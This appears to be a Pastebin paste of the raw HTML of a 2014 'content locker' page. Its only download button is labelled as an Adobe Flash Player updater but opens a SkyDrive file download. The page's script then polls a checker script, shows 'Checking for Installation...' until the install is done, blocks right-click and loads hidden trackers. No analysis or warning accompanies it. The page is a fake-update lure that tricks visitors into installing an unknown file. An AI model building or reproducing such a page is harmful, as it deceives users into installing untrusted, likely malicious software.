Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- HTTP/1.1 200 OK
- Date: Thu, 16 Jan 2014 13:20:08 GMT
- Server: Apache
- Accept-Ranges: bytes
- Content-Length: 10326
- Connection: close
- Content-Type: text/html
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
- <title></title>
- <script type="text/javascript">
- var closing = false;
- var http = getHTTPObject();
- var http2 = getHTTPObject();
- var tab = '';
- var check = 1;
- function doauth() {
- if (closing == false) {
- setTimeout("doauth();", 15000);
- http.open("GET", "checker.php", true);
- http.onreadystatechange = handleHttpResponse;
- http.send(null);
- }
- }
- function handleHttpResponse() {
- if (http.readyState == 4) {
- if (http.responseText != '') {
- rslt = http.responseText;
- arr = rslt.split("||");
- if (arr[0] == 'true') {
- closing = true;
- if (arr[1] == '0') {
- top.location.href = document.referrer;
- } else {
- top.location.href = arr[1];
- }
- }
- }
- }
- }
- function getHTTPObject() {
- var xmlhttp;
- /*@cc_on
- @if (@
- _jscript_version >= 5
- )
- try {
- xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
- } catch (e) {
- try {
- xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
- } catch (E) {
- xmlhttp = false;
- }
- }
- @else
- xmlhttp = false;
- @end @*/
- if (!xmlhttp && typeof XMLHttpRequest != 'undefined') {
- try {
- xmlhttp = new XMLHttpRequest();
- } catch (e) {
- xmlhttp = false;
- }
- }
- return xmlhttp;
- }
- function openoffer(offerid, fromtab) {
- if (offerid == 14247) {
- newwindow = window.open("https://skydrive.live.com/download.aspx?cid=a688a826ff19b912&resid=A688A826FF19B912%21115", '_blank');
- }
- if (offerid == 12370) {
- newwindow = window.open("https://skydrive.live.com/download.aspx?cid=a688a826ff19b912&resid=A688A826FF19B912%21115", '_blank');
- }
- if (offerid == 19202) {
- newwindow = window.open("https://skydrive.live.com/download.aspx?cid=a688a826ff19b912&resid=A688A826FF19B912%21115", '_blank');
- }
- document.getElementById(fromtab).style.display = 'none';
- document.getElementById('spnChecking').innerHTML = 'Checking for Installation...';
- document.getElementById('divWait').style.display = 'block';
- tab = fromtab;
- check = 1;
- changeCheck();
- if (window.focus) {
- newwindow.focus();
- }
- }
- function openpp() {
- //newwindow = window.open("https://adscendmedia.com/pp_click.php?aff=8663&gate=18120&sid=&p=aHR0cDovL3Nob3ctcGFzcy5jb20v", '_blank');
- }
- function closeWait() {
- document.getElementById('divWait').style.display = 'none';
- if (tab != '') {
- document.getElementById(tab).style.display = 'block';
- }
- check = -1;
- }
- function changeCheck() {
- if (check == 1) {
- document.getElementById('spnChecking').innerHTML = 'Checking for Installation...';
- check = 2;
- setTimeout("changeCheck();", 3000);
- } else if (check == 2) {
- document.getElementById('spnChecking').innerHTML = 'Installation not yet completed.';
- check = 1;
- setTimeout("changeCheck();", 1600);
- }
- }
- function ChangeTab(whichtab) {
- closeWait();
- if (whichtab == "survey") {
- document.getElementById('gw_offers').style.display = 'block';
- tab = 'gw_offers';
- } else if (whichtab == "cell") {
- document.getElementById('gw_offers').style.display = 'none';
- tab = 'divCell';
- } else if (whichtab == "paypal") {
- document.getElementById('gw_offers').style.display = 'none';
- tab = 'divPayPal';
- } else if (whichtab == "try") {
- document.getElementById('gw_offers').style.display = 'none';
- tab = 'divTry';
- }
- }
- </script>
- <style type="text/css">
- a {
- color: #0E96C8;
- text-decoration: none;
- }
- a:hover {
- color: #0E96C8;
- text-decoration: underline;
- }
- .hint--bottom {
- text-decoration: none;
- }
- body {
- background-color: rgba(0, 0, 0, 0);
- background-image: url("http://i.imgur.com/Eowdtzw.gif");
- color: #000000;
- margin-left: 0;
- margin-right: 20px;
- margin-top: 24px;
- overflow: hidden;
- padding: 0;
- }
- #gw_frame_main {
- height: 311px;
- width: 610px;
- }
- #gw_header {
- color: #000000;
- font-family: Arial;
- font-size: 16px;
- font-weight: bold;
- padding-bottom: 10px;
- padding-top: 5px;
- }
- .instructions {
- font-family: Arial;
- font-size: 14px;
- margin-right: 30px;
- padding-top: 7px;
- text-align: left;
- }
- #divWait {
- font-family: Arial;
- font-size: 14px;
- margin-top: -5px;
- }
- #gw_content {
- padding: 15px 15px 20px;
- }
- #offer_container, #divCell, #divPayPal, #divTry {
- padding-left: 57px;
- padding-top: 10px;
- text-align: left;
- }
- .gw_offer {
- margin-bottom: 16px;
- padding-right: 75px;
- }
- .offerlink {
- font-family: Verdana;
- font-size: 36px;
- padding-top: 60px;
- }
- #gw_offertable {
- border-style: none;
- margin-right: 15px;
- }
- #gw_offertable td {
- padding-left: 15px;
- vertical-align: top;
- }
- #gw_powered {
- bottom: 5px;
- font-family: Verdana;
- font-size: 10px;
- left: 10px;
- margin-bottom: 10px;
- margin-left: 10px;
- position: absolute;
- z-index: 1999008;
- }
- </style>
- </head>
- <body onload="doauth();">
- <link rel="stylesheet" href="hint.css">
- <div id="gw_frame_main">
- <div style="margin:0px;" align="center">
- <div id="gw_instructions" class="instructions" style="margin-left:45px; margin-right:45px;">
- <br><br><br><br></div>
- <div id="gw_content">
- <div style="display: block;" id="gw_offers">
- <div id="offer_container">
- <center>
- <div class="gw_offer">
- <a href="http:///" onclick="javascript:openoffer(14247,'gw_offers'); return false;"
- class="offerlink hint--bottom hint--rounded"
- data-hint="Press here to download Adobe Flash Player updater">DOWNLOAD</a>
- </div>
- </center>
- </div>
- </div>
- <div id="divWait" style="display: none;">
- <div style="height:190px;width:420px;z-index:1999007;text-align:left;overflow:hidden;padding-top:1px;">
- <br>
- <br>
- <br>
- <div style="margin-top:9px;margin-bottom:12px;margin-left:20px;"><img src="wheel-throb.gif"
- style="width:32px;height:32px;vertical-align:middle;margin-right:15px;margin-bottom:6px;"><span
- style="margin-top:12px;" id="spnChecking">Installation not yet completed.</span></div>
- If you believe you finished the installation and this page is still not unlocking,
- please <a href="http:///" onclick="javascript:closeWait(); return false;"
- style="text-decoration:underline;"><b>Return to the Download page</b></a> and try again.
- </div>
- </div>
- </div>
- <!--div id="gw_powered" align="left">
- <a href="http://adscendmedia.com/gwhelp.php?p=8663" target="_blank">Need Help?</a>
- </div-->
- </div>
- </div>
- <script type="text/javascript">
- ChangeTab('survey');
- var message = "";
- function clickIE() {
- if (document.all) {
- (message);
- return false;
- }
- }
- function clickNS(e) {
- if
- (document.layers || (document.getElementById && !document.all)) {
- if (e.which == 2 || e.which == 3) {
- (message);
- return false;
- }
- }
- }
- if (document.layers) {
- document.captureEvents(Event.MOUSEDOWN);
- document.onmousedown = clickNS;
- }
- else {
- document.onmouseup = clickNS;
- document.oncontextmenu = clickIE;
- }
- document.oncontextmenu = new Function("return false");
- </script>
- <!-- Start of StatCounter Code for Default Guide -->
- <script type="text/javascript">
- var sc_project = 9330578;
- var sc_invisible = 1;
- var sc_security = "279066e3";
- var scJsHost = (("https:" == document.location.protocol) ?
- "https://secure." : "http://www.");
- document.write("<sc" + "ript type='text/javascript' src='" +
- scJsHost +
- "statcounter.com/counter/counter.js'></" + "script>");
- </script>
- <script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
- <noscript>
- <div class="statcounter"><a title="free hit
- counter" href="http://statcounter.com/free-hit-counter/"
- target="_blank"><img class="statcounter"
- src="http://c.statcounter.com/9330578/0/279066e3/1/"
- alt="free hit counter"></a></div>
- </noscript>
- <!-- End of StatCounter Code for Default Guide -->
- <script type="text/javascript"><!--
- document.writeln('<' + 'scr' + 'ipt type="text/javascript" src="http://home.hit.stat24.com/_' + (new Date()).getTime() + '/script.js?id=bIhFz1SlveviMduIkuqjAZRLrqwuTENLdUGMd.F2NFL.u7"></' + 'scr' + 'ipt>');
- //--></script>
- <script type="text/javascript"
- src="http://home.hit.stat24.com/_1389649998596/script.js?id=bIhFz1SlveviMduIkuqjAZRLrqwuTENLdUGMd.F2NFL.u7"></script>
- <script type="text/javascript" src="http://home.hit.stat24.com/cachedscriptxy.js"></script>
- </body>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement